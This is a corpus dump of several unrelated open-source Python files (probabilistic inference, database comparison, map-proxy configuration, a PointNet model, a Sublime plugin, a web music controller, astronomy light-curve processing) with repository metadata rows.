| 28.727273 | 84 | 0.580552 | 450 | 3,476 | 4.36 | 0.262222 | 0.091743 | 0.040775 | 0.044852 | 0.353721 | 0.333843 | 0.331295 | 0.30683 | 0.30683 | 0.303262 | 0 | 0.007576 | 0.316456 | 3,476 | 120 | 85 | 28.966667 | 0.818182 | 0.267261 | 0 | 0.31746 | 0 | 0 | 0.070973 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0.015873 | 0.063492 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6236c0efdf34fd70e80e0c0f8ddc930550ff4733 | 4,856 | py | Python | mxfusion/inference/expectation.py | JeremiasKnoblauch/MXFusion | af6223e9636b055d029d136dd7ae023b210b4560 | [
"Apache-2.0"
] | 2 | 2019-05-31T09:50:47.000Z | 2021-03-06T09:38:47.000Z | mxfusion/inference/expectation.py | JeremiasKnoblauch/MXFusion | af6223e9636b055d029d136dd7ae023b210b4560 | [
"Apache-2.0"
] | null | null | null | mxfusion/inference/expectation.py | JeremiasKnoblauch/MXFusion | af6223e9636b055d029d136dd7ae023b210b4560 | [
"Apache-2.0"
] | 1 | 2019-05-30T09:39:46.000Z | 2019-05-30T09:39:46.000Z | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
# ==============================================================================
from ..common.exceptions import InferenceError
from ..components.variables import Variable, VariableType
from .variational import StochasticVariationalInference
from .inference_alg import SamplingAlgorithm
from .inference import TransferInference
from .map import MAP
from ..components.variables.runtime_variable import expectation
class ExpectationAlgorithm(SamplingAlgorithm):
"""
Sampling-based inference algorithm that returns the expectation of each variable in the model.
:param model: the definition of the probabilistic model
:type model: Model
:param observed: A list of observed variables
:type observed: [Variable]
:param num_samples: the number of samples used in estimating the variational lower bound
:type num_samples: int
:param target_variables: (optional) the target variables to sample
:type target_variables: [UUID]
:param extra_graphs: a list of extra FactorGraph used in the inference
algorithm.
:type extra_graphs: [FactorGraph]
"""
def compute(self, F, variables):
"""
Compute the inference algorithm
:param F: the execution context (mxnet.ndarray or mxnet.symbol)
:type F: Python module
:param variables: the set of MXNet arrays that holds the values of
variables at runtime.
:type variables: {str(UUID): MXNet NDArray or MXNet Symbol}
:returns: the outcome of the inference algorithm
:rtype: mxnet.ndarray.ndarray.NDArray or mxnet.symbol.symbol.Symbol
"""
samples = self.model.draw_samples(
F=F, variables=variables,
num_samples=self.num_samples)
samples = {k: expectation(F,v) for k, v in samples.items()}
if self.target_variables:
return tuple(samples[v] for v in self.target_variables)
else:
return samples
class ExpectationScoreFunctionAlgorithm(SamplingAlgorithm):
"""
Sampling-based inference algorithm that computes the expectation of the model w.r.t. some loss function in that model, specified as the target variable. It does so via the score function trick sampling the necessary inputs to the function and using them to compute a Monte Carlo estimate of the loss function's gradient.
:param model: the definition of the probabilistic model
:type model: Model
:param observed: A list of observed variables
:type observed: [Variable]
:param num_samples: the number of samples used in estimating the variational lower bound
:type num_samples: int
:param target_variables: the target function in the model to optimize. should only be one for this.
:type target_variables: [UUID]
:param extra_graphs: a list of extra FactorGraph used in the inference
algorithm.
:type extra_graphs: [FactorGraph]
"""
def compute(self, F, variables):
"""
Compute the inference algorithm
:param F: the execution context (mxnet.ndarray or mxnet.symbol)
:type F: Python module
:param variables: the set of MXNet arrays that holds the values of
variables at runtime.
:type variables: {str(UUID): MXNet NDArray or MXNet Symbol}
:returns: the outcome of the inference algorithm
:rtype: mxnet.ndarray.ndarray.NDArray or mxnet.symbol.symbol.Symbol
"""
samples = self.model.draw_samples(
F=F, variables=variables,
num_samples=self.num_samples)
variables.update(samples)
targets = [v for v in self.model.get_latent_variables(self.observed_variables) if v.type == VariableType.RANDVAR]
q_z_lambda = self.model.log_pdf(F=F, variables=variables, targets=targets)
p_x_z = variables[self.target_variables[0]]
gradient_lambda = F.mean(q_z_lambda * F.stop_gradient(p_x_z), axis=0)
# TODO known issue.
# This will double count the gradient of any distribution using the
# reparameterization trick (i.e. Normal). Issue #91
gradient_theta = F.mean(p_x_z, axis=0)
gradient_log_L = gradient_lambda + gradient_theta
return gradient_theta, gradient_log_L
| 43.357143 | 324 | 0.691722 | 631 | 4,856 | 5.248811 | 0.307448 | 0.043478 | 0.038043 | 0.036232 | 0.49215 | 0.480676 | 0.449275 | 0.449275 | 0.449275 | 0.449275 | 0 | 0.003457 | 0.225494 | 4,856 | 111 | 325 | 43.747748 | 0.87716 | 0.616145 | 0 | 0.266667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009009 | 0 | 1 | 0.066667 | false | 0 | 0.233333 | 0 | 0.466667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6238597c0d39cb63e71a7c713b24cede2d02b509 | 833 | py | Python | scripts/one-offs/semi_manual_test.py | whiteavian/data_compare | 125e73a64ff4409c419903e885ca75a877a39c9a | [
"MIT"
] | 6 | 2019-02-08T22:12:26.000Z | 2021-03-18T04:36:24.000Z | scripts/one-offs/semi_manual_test.py | whiteavian/data_compare | 125e73a64ff4409c419903e885ca75a877a39c9a | [
"MIT"
] | null | null | null | scripts/one-offs/semi_manual_test.py | whiteavian/data_compare | 125e73a64ff4409c419903e885ca75a877a39c9a | [
"MIT"
] | null | null | null | from data_compare.relational_data import RelationalData
from data_compare.sql_database import SQLDatabase
from test_compare_schemas import (
DBA_CONN,
DBB_CONN,
)
sa = SQLDatabase(DBA_CONN)
sb = SQLDatabase(DBB_CONN)
sa.compare_schemas(sb)
#
table_a = sa.table_from_name('users')
table_b = sb.table_from_name('users')
res_a = sa.conn.execute(table_a.select())
res_b = sb.conn.execute(table_b.select())
a = res_a.fetchall()
b = res_b.fetchall()
headers_a = tuple(c.name for c in table_a.columns)
headers_b = tuple(c.name for c in table_b.columns)
# Add error in "real" case for when the length > 1
pk_a = sa.table_pk_col_names(table_a)[0]
pk_b = sb.table_pk_col_names(table_b)[0]
a.insert(0, headers_a)
b.insert(0, headers_b)
a
b
a_rd = RelationalData(a, pk_a)
b_rd = RelationalData(b, pk_b)
a_rd.compare(b_rd)
a_rd.errors | 21.358974 | 55 | 0.762305 | 157 | 833 | 3.751592 | 0.292994 | 0.040747 | 0.050934 | 0.061121 | 0.139219 | 0.071307 | 0.071307 | 0 | 0 | 0 | 0 | 0.006821 | 0.120048 | 833 | 39 | 56 | 21.358974 | 0.796726 | 0.057623 | 0 | 0 | 0 | 0 | 0.012771 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.111111 | 0 | 0.111111 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62398418512e8c40f065638f42f0937f72a32ec8 | 2,280 | py | Python | wmsproxy/config_cache.py | omniscale/cartodb-wmsproxy | 0195c341195745cb5cadf43d1eeccc179d655251 | [
"Apache-2.0"
] | 2 | 2015-10-31T08:05:46.000Z | 2016-07-05T09:44:27.000Z | wmsproxy/config_cache.py | omniscale/cartodb-wmsproxy | 0195c341195745cb5cadf43d1eeccc179d655251 | [
"Apache-2.0"
] | 2 | 2015-08-24T15:21:27.000Z | 2017-01-19T11:29:07.000Z | wmsproxy/config_cache.py | omniscale/cartodb-wmsproxy | 0195c341195745cb5cadf43d1eeccc179d655251 | [
"Apache-2.0"
] | 1 | 2015-07-22T12:46:43.000Z | 2015-07-22T12:46:43.000Z | import os
import errno
import time
from wmsproxy.viz import tile_params, user_uuids, RequestError
from wmsproxy.config_writer import mapproxy_config, write_mapproxy_config
from mapproxy.util.lock import FileLock
import logging
log = logging.getLogger(__name__)
class ConfigCache(object):
def __init__(self, cache_dir, max_age_seconds=30*60):
self.cache_dir = cache_dir
self.max_age_seconds =max_age_seconds
def _requires_reconf(self, conf_filename):
"""
Returns True if conf_filename is missing or older then max_age_seconds.
"""
try:
mtime = os.path.getmtime(conf_filename)
except OSError as exc:
if exc.errno == errno.ENOENT:
return True
raise exc
return (time.time() - self.max_age_seconds) > mtime
def config(self, user, uuid=None, max_uuids=50):
conf_filename = os.path.join(self.cache_dir, (uuid or user) + '.yaml')
if self._requires_reconf(conf_filename):
with FileLock(conf_filename + '.lck'):
if self._requires_reconf(conf_filename):
log.debug('(re)configure %s for %s', (uuid or "all"), user)
if uuid:
params = tile_params(user, uuid)
if params is None:
return
conf = mapproxy_config([params], user=user)
else:
layers = []
for uuid in user_uuids(user, max_uuids=max_uuids):
try:
params = tile_params(user, uuid)
if params:
layers.append(params)
else:
log.warn("found no layer for %s %s", user, uuid)
except RequestError as ex:
log.warn("faild to query tiler for %s %s: %s", user, uuid, ex)
if not layers:
return
conf = mapproxy_config(layers, user=user)
write_mapproxy_config(conf, conf_filename)
return conf_filename
| 36.190476 | 94 | 0.520614 | 246 | 2,280 | 4.609756 | 0.349594 | 0.095238 | 0.057319 | 0.029982 | 0.112875 | 0.112875 | 0.056437 | 0 | 0 | 0 | 0 | 0.004422 | 0.404825 | 2,280 | 62 | 95 | 36.774194 | 0.831245 | 0.03114 | 0 | 0.212766 | 0 | 0 | 0.042582 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.06383 | false | 0 | 0.148936 | 0 | 0.340426 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6239b1c95d7f08d8c92352fd62de799cccb0e3b1 | 1,796 | py | Python | pcrnet/models/pointnet.py | asafmanor/pcrnet_pytorch | e9f34e918f5582e7c0969481a96036dd5fb046cd | [
"MIT"
] | 48 | 2020-01-06T07:21:13.000Z | 2022-02-19T10:34:50.000Z | pcrnet/models/pointnet.py | asafmanor/pcrnet_pytorch | e9f34e918f5582e7c0969481a96036dd5fb046cd | [
"MIT"
] | 11 | 2020-03-21T11:49:21.000Z | 2021-02-06T09:31:30.000Z | pcrnet/models/pointnet.py | asafmanor/pcrnet_pytorch | e9f34e918f5582e7c0969481a96036dd5fb046cd | [
"MIT"
] | 12 | 2020-01-12T10:18:53.000Z | 2022-01-11T07:48:26.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from .pooling import Pooling
class PointNet(torch.nn.Module):
def __init__(self, emb_dims=1024, input_shape="bnc"):
# emb_dims: Embedding Dimensions for PointNet.
# input_shape: Shape of Input Point Cloud (b: batch, n: no of points, c: channels)
super(PointNet, self).__init__()
if input_shape not in ["bcn", "bnc"]:
raise ValueError("Allowed shapes are 'bcn' (batch * channels * num_in_points), 'bnc' ")
self.input_shape = input_shape
self.emb_dims = emb_dims
self.layers = self.create_structure()
def create_structure(self):
self.conv1 = torch.nn.Conv1d(3, 64, 1)
self.conv2 = torch.nn.Conv1d(64, 64, 1)
self.conv3 = torch.nn.Conv1d(64, 64, 1)
self.conv4 = torch.nn.Conv1d(64, 128, 1)
self.conv5 = torch.nn.Conv1d(128, self.emb_dims, 1)
self.relu = torch.nn.ReLU()
layers = [self.conv1, self.relu,
self.conv2, self.relu,
self.conv3, self.relu,
self.conv4, self.relu,
self.conv5, self.relu]
return layers
def forward(self, input_data):
# input_data: Point Cloud having shape input_shape.
# output: PointNet features (Batch x emb_dims)
if self.input_shape == "bnc":
num_points = input_data.shape[1]
input_data = input_data.permute(0, 2, 1)
else:
num_points = input_data.shape[2]
if input_data.shape[1] != 3:
raise RuntimeError("shape of x must be of [Batch x 3 x NumInPoints]")
output = input_data
for idx, layer in enumerate(self.layers):
output = layer(output)
return output
if __name__ == '__main__':
# Test the code.
x = torch.rand((10,1024,3))
pn = PointNet(use_bn=True)
y = pn(x)
print("Network Architecture: ")
print(pn)
print("Input Shape of PointNet: ", x.shape, "\nOutput Shape of PointNet: ", y.shape) | 29.933333 | 90 | 0.688753 | 282 | 1,796 | 4.230496 | 0.326241 | 0.052808 | 0.054484 | 0.03772 | 0.07544 | 0.036882 | 0.036882 | 0 | 0 | 0 | 0 | 0.039429 | 0.180958 | 1,796 | 60 | 91 | 29.933333 | 0.771584 | 0.134744 | 0 | 0 | 0 | 0 | 0.134926 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.090909 | 0 | 0.227273 | 0.068182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6239b1d06e89b20744d2f2cb973c6786d7836969 | 2,512 | py | Python | proofs_go_to_spec.py | proofgov/ProofsGoToSpec | dbcbd06c40ad5eae62cf90ca6af6ecd297276b8c | [
"MIT"
] | null | null | null | proofs_go_to_spec.py | proofgov/ProofsGoToSpec | dbcbd06c40ad5eae62cf90ca6af6ecd297276b8c | [
"MIT"
] | 1 | 2020-07-19T23:16:18.000Z | 2020-08-10T16:24:52.000Z | proofs_go_to_spec.py | proofgov/ProofsGoToSpec | dbcbd06c40ad5eae62cf90ca6af6ecd297276b8c | [
"MIT"
] | null | null | null | import os
import re
import sublime
import sublime_plugin
from . import resolver
class ProofsGoToSpecCommand(sublime_plugin.WindowCommand):
def run(self):
sublime.status_message("Running PROOF's Go To Spec")
win = self.window
view = win.active_view()
current_file = view.file_name()
# remove the root dir
try:
root_path = win.folders()[0]
except IndexError:
return "There are no files open to handle."
current_file = re.sub(root_path, "", current_file)
if os.name == "nt":
current_file = current_file.replace("\\", "/")
extension = current_file.rsplit(".", 1)[1]
preferences = self.get_preferences(extension)
related_files = resolver.Resolver().run(current_file, **preferences)
# add the root dir to all files
for ix, file in enumerate(related_files):
related_files[ix] = root_path + file
self.open_any(related_files)
def is_enabled(self):
return self.window.active_view() is not None
def open_any(self, files):
if len(files) == 0:
sublime.status_message("Not a valid file")
return
opened = False
for file in files:
if not opened:
opened = self.open(file)
if opened:
return
first = files[0]
if sublime.ok_cancel_dialog("Create file? " + first):
self.create(first)
self.window.open_file(first)
def open(self, file):
if file == "":
sublime.status_message("Not a valid file")
return False
if os.path.exists(file):
sublime.status_message("File exists " + file)
self.window.open_file(file)
sublime.status_message("Opening " + file)
return True
else:
return False
def create(self, filename):
base, filename = os.path.split(filename)
self.create_folder(base)
def create_folder(self, base):
if not os.path.exists(base):
parent = os.path.split(base)[0]
if not os.path.exists(parent):
self.create_folder(parent)
os.mkdir(base)
def get_preferences(self, extension="rb"):
preferences = sublime.load_settings("ProofsGoToSpec.sublime-settings")
return preferences.get(extension) or {
"spec_folder": "spec",
"spec_ends_with": "spec",
}
| 28.224719 | 78 | 0.582006 | 296 | 2,512 | 4.804054 | 0.314189 | 0.054149 | 0.070323 | 0.050633 | 0.078762 | 0.054852 | 0.054852 | 0.054852 | 0 | 0 | 0 | 0.003499 | 0.317277 | 2,512 | 88 | 79 | 28.545455 | 0.825656 | 0.019506 | 0 | 0.090909 | 0 | 0 | 0.080081 | 0.012602 | 0 | 0 | 0 | 0 | 0 | 1 | 0.106061 | false | 0 | 0.075758 | 0.015152 | 0.318182 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
623beaedf7161b7fcf19fc44bd49f0c9204f1e5b | 5,469 | py | Python | skika/hyper_parameter_tuning/trees_arf/meta_feature_generator.py | cpearce/scikit-ika | 01f90ac3e7963e4d05f73316a7d14de0d8f08d1e | [
"BSD-3-Clause"
] | 4 | 2020-04-29T03:36:36.000Z | 2021-09-01T02:46:19.000Z | skika/hyper_parameter_tuning/trees_arf/meta_feature_generator.py | cpearce/scikit-ika | 01f90ac3e7963e4d05f73316a7d14de0d8f08d1e | [
"BSD-3-Clause"
] | 2 | 2020-05-04T07:46:31.000Z | 2022-03-14T20:28:25.000Z | skika/hyper_parameter_tuning/trees_arf/meta_feature_generator.py | cpearce/scikit-ika | 01f90ac3e7963e4d05f73316a7d14de0d8f08d1e | [
"BSD-3-Clause"
] | 3 | 2020-02-21T00:27:32.000Z | 2020-05-04T07:04:35.000Z | # Imports
import numpy as np
#from skmultiflow.evaluation.base_evaluator import StreamEvaluator
#from skmultiflow import data
#from skmultiflow.metrics import WindowClassificationMeasurements, ClassificationMeasurements, \
# MultiTargetClassificationMeasurements, WindowMultiTargetClassificationMeasurements, RegressionMeasurements, \
# WindowRegressionMeasurements, MultiTargetRegressionMeasurements, \
# WindowMultiTargetRegressionMeasurements, RunningTimeMeasurements
class ComputeStreamMetaFeatures():
"""
Description :
Compute extraction of several meta-features on the stream.
"""
# TODO : Create a file to list features to be extracted (like constants in scikit.multiflow)
def __init__(self,
stream = None,
list_feat = None):
if stream != None :
self.stream = stream
else :
raise ValueError("A stream must be specified")
# TODO : test here if meat-feat in list are correct
if ((list_feat != None) and (isinstance(list_feat, list))):
self.list_feat = list_feat
else :
raise ValueError("A list of features must be specified. Attibute 'list_feat' must be 'list'")
# List of stream samples for redundancy calculation
self.list_stream_samples = []
# List of stream prediction and true labels for severity calculation
self.list_predicted_y = []
self.list_true_y = []
# List of stream instances for magnitude calculation
self.list_instances_after_drift = []
self.list_instances_before_drift = []
# List of predictions for magnitude calculation
self.list_predictions_after_drift = []
self.list_predictions_before_drift = []
def run_extraction(self, list_extrac):
list_model_meta_feats = []
list_drift_meta_feats = []
if 'perc_redund_feat' in self.list_feat and 'perc_redund_feat' in list_extrac :
list_model_meta_feats.append(self.extractPercRedundFeatMeasured())
if 'drift_severity' in self.list_feat and 'drift_severity' in list_extrac :
list_drift_meta_feats.append(self.extractSeverityOneDrift())
if 'drift_magnitude_inst' in self.list_feat and 'drift_magnitude_inst' in list_extrac :
w1 = np.array(self.list_instances_before_drift)
w2 = np.array(self.list_instances_after_drift)
list_drift_meta_feats.append(self.extractMagnitudeOneDrift(w1,w2))
if 'drift_magnitude_att' in self.list_feat and 'drift_magnitude_att' in list_extrac :
w1 = np.array(self.list_instances_before_drift).T
w2 = np.array(self.list_instances_after_drift).T
list_drift_meta_feats.append(self.extractMagnitudeOneDrift(w1,w2))
if 'drift_magnitude_pred' in self.list_feat and 'drift_magnitude_pred' in list_extrac :
w1 = np.array(self.list_predictions_after_drift)
w2 = np.array(self.list_predictions_before_drift)
list_drift_meta_feats.append(self.extractMagnitudeOneDrift(w1,w2))
return list_model_meta_feats, list_drift_meta_feats
################
# Meta-features
################
## Model related
# Extract percentage of redundant features by simple reading of stream attribute
def extractPercRedundFeat(self) :
""" Extraction of the percentage of redundant features, directly read from the stream parameters
"""
return self.stream.perc_redund_features
# Extract percentage of redundant features by measuring correlation between features
def extractPercRedundFeatMeasured(self):
""" Extraction of the percentage of redundant features, measured on the stream by correlation between features
"""
array_samples = np.vstack(self.list_stream_samples)
corr_matrix = np.corrcoef(array_samples,rowvar=False)
n_feat_redund = 0
for i in range(self.stream.n_features) :
for j in range(i-1):
if corr_matrix[i][j] > 0.8 :
n_feat_redund +=1
break
perc_redund_measured = n_feat_redund/self.stream.n_features
# print('Perc redund measured : {}'.format(perc_redund_measured))
return perc_redund_measured
## Drift related
def extractSeverityOneDrift(self):
""" Extraction of the severity of a single drift
"""
n_instances_in_warning = len(self.list_predicted_y)
n_missclass_in_warning = 0
for i in range(n_instances_in_warning) :
if self.list_predicted_y[i] != self.list_true_y[i] :
n_missclass_in_warning += 1
severity = n_missclass_in_warning/n_instances_in_warning
print('Severity measured : {}'.format(severity))
return severity
# def hellinger(p, q):
# return np.sqrt(np.sum((np.sqrt(p) - np.sqrt(q)) ** 2)) / np.sqrt(2)
def extractMagnitudeOneDrift(self,p,q):
""" Extraction of the magnitude of a single drift
Attributes :
p : distribution before drift (array)
q : distribution after drift (array)
"""
P = p/p.sum()
Q = q/q.sum()
# Magnitude = hellinger distance
magnitude = np.sqrt(np.sum((np.sqrt(P) - np.sqrt(Q)) ** 2)) / np.sqrt(2)
print('Magnitude measured : {}'.format(magnitude))
return magnitude
| 36.218543 | 118 | 0.666118 | 643 | 5,469 | 5.432348 | 0.225505 | 0.054967 | 0.020613 | 0.030919 | 0.329516 | 0.262525 | 0.209276 | 0.182651 | 0.107071 | 0.107071 | 0 | 0.005611 | 0.250503 | 5,469 | 150 | 119 | 36.46 | 0.846548 | 0.309746 | 0 | 0.073529 | 0 | 0 | 0.08873 | 0 | 0 | 0 | 0 | 0.006667 | 0 | 1 | 0.088235 | false | 0 | 0.014706 | 0 | 0.191176 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
623d4c734ef05d43ec6efbe7c20cf02af7a7937a | 3,477 | py | Python | webserver.py | seanthegeek/pd-html5 | 241e364b30751a26c3a313d7c88cdbb48837d40e | [
"Unlicense"
] | 4 | 2015-05-26T00:01:57.000Z | 2017-08-07T15:46:31.000Z | webserver.py | seanthegeek/pd-html5 | 241e364b30751a26c3a313d7c88cdbb48837d40e | [
"Unlicense"
] | null | null | null | webserver.py | seanthegeek/pd-html5 | 241e364b30751a26c3a313d7c88cdbb48837d40e | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python
'''
webserver - Brings PD to the web
Copyright (C) 2012 Sean Whalen
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
from os import listdir
import cherrypy
import pd
class Root(object):
"""
The dynamic web root
"""
@cherrypy.expose()
def set_volume(self, value):
"""
Sets the volume to the given percentage
@param value: the volume percentage
"""
value = int(value)
if value >= 0 and value <= 100:
self._volume = value
self._pd.set_volume(self._volume)
else:
raise cherrypy._cperror.HTTPError(404)
@cherrypy.expose()
def set_reverb(self, value):
"""
Sets the reverberation to the given percentage
@param value: the reverberation percentage
"""
value = int(value)
if value >= 0 and value <= 100:
self._reverb = value
self._pd.set_reverb(self._reverb)
else:
raise cherrypy._cperror.HTTPError(404)
@cherrypy.expose()
def play(self, value):
"""
Plays the selected track
@param value: the index value from the list of tracks
"""
value = int(value)
if value >= 0 and value <= len(self._tracks) - 1:
self._track = value
self._pd.play(self._tracks[self._track])
else:
raise cherrypy._cperror.HTTPError(404)
@cherrypy.expose()
def pause(self):
"""
Pauses or resumes music playback
"""
self._pd.pause()
def __init__(self):
"""
Connects to PD and sets the initial values
"""
self._pd = pd.Client("127.0.0.1", 3000)
self._track = 0
self.set_volume(30)
self.set_reverb(0)
self._tracks = sorted(listdir("music"))
for track in self._tracks:
if track.startswith("."):
self._tracks.remove(track)
@cherrypy.expose()
@cherrypy.tools.json_out()
def get_tracks(self):
"""
Returns a JSON list of tracks
"""
return self._tracks
@cherrypy.expose()
@cherrypy.tools.json_out()
def get_status(self):
"""
Returns JSON pairs containing current values
"""
return {"track": self._track,
"volume": self._volume,
"reverb": self._reverb}
if __name__ == '__main__':
cherrypy.quickstart(Root(), config="webserver.conf")
| 30.234783 | 79 | 0.629853 | 442 | 3,477 | 4.850679 | 0.386878 | 0.041045 | 0.031716 | 0.020989 | 0.198694 | 0.198694 | 0.198694 | 0.16791 | 0.117071 | 0.04291 | 0 | 0.01483 | 0.282427 | 3,477 | 114 | 80 | 30.5 | 0.844489 | 0.438596 | 0 | 0.365385 | 0 | 0 | 0.030963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.134615 | false | 0 | 0.057692 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6241b30db0b388e0cf48062ffaf258a9876a9df8 | 705 | py | Python | file_io/output.py | dp19982/rpfr_calculator | a2dc6bd3f55e8f50723324aecb298ede014e955c | [
"MIT"
] | 1 | 2021-09-01T16:50:59.000Z | 2021-09-01T16:50:59.000Z | file_io/output.py | dp19982/rpfr_calculator | a2dc6bd3f55e8f50723324aecb298ede014e955c | [
"MIT"
] | null | null | null | file_io/output.py | dp19982/rpfr_calculator | a2dc6bd3f55e8f50723324aecb298ede014e955c | [
"MIT"
] | 1 | 2021-09-01T16:19:05.000Z | 2021-09-01T16:19:05.000Z | # Written by Devang Patel
# GitHub username: acse-dp1820
import os
def output_file(filename):
"""
Checks if the file exists + creates filepath with any associated directories.
Parameters:
-----------
filename: str
location of output file
"""
# if file exists, print filepath
if os.path.isfile(filename):
print("The output filepath is: " + filename)
# if file doesn't exist, create the filepath even if some directories exist and print filepath
else:
print("Creating file + associated directories.")
os.makedirs(os.path.dirname(filename), exist_ok=True)
print("The output filepath is: " + filename)
| 29.375 | 99 | 0.639716 | 85 | 705 | 5.282353 | 0.529412 | 0.044543 | 0.062361 | 0.097996 | 0.142539 | 0.142539 | 0 | 0 | 0 | 0 | 0 | 0.007737 | 0.266667 | 705 | 23 | 100 | 30.652174 | 0.860735 | 0.456738 | 0 | 0.25 | 0 | 0 | 0.267692 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.25 | 0.375 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62425da651aff65da4e4e8d8531685e2a01a3929 | 2,271 | py | Python | examples/K2-141_dataset/show_data.py | lucaborsato/PyORBIT | 700146d59674dae77983da979af39cef7c77f408 | [
"MIT"
] | null | null | null | examples/K2-141_dataset/show_data.py | lucaborsato/PyORBIT | 700146d59674dae77983da979af39cef7c77f408 | [
"MIT"
] | null | null | null | examples/K2-141_dataset/show_data.py | lucaborsato/PyORBIT | 700146d59674dae77983da979af39cef7c77f408 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
data = np.genfromtxt('K2-141_detrended_bonly.csv', delimiter=',', skip_header=1, dtype=np.double)
planetb_period = 0.2803234429
sel = (data[:,0] < 0.00000)
TIME = data[:,0]+planetb_period*sel
PHA = TIME/planetb_period
VAL = data[:,2]
sel = (PHA> 0.2) & (PHA<0.8)
K2_error_estimate = np.std(VAL[sel]) #
K2_error_estimate = 0.00002 # Halved and rounded in order to allow for variation of the jitter parameter
#create file with transit of only planet b
TIME = data[:,1] + 4833.00
fileout = open('K2-141_detrended_bonly.dat','w')
for t,f in zip(TIME,VAL):
fileout.write('{0:f} {1:f} {2:f} 0 -1 -1 \n'.format(t,f,K2_error_estimate))
fileout.close()
data = np.genfromtxt('K2-141_raw_noplanets.dat')
TIME = data[:,0]
RAW = data[:,1]
size_full = np.size(data[:,0])
size_tobereshaped = size_full - size_full % 5
BJD = data[:size_tobereshaped,0]
VAL = data[:size_tobereshaped,1]
BJD_avg = np.mean(BJD.reshape(-1, 5), axis=1)
VAL_avg = np.mean(VAL.reshape(-1, 5), axis=1)
ERR_avg = np.std(VAL.reshape(-1, 5), axis=1)
fileout = open('K2-141_raw_noplanets_5sampled.dat','w')
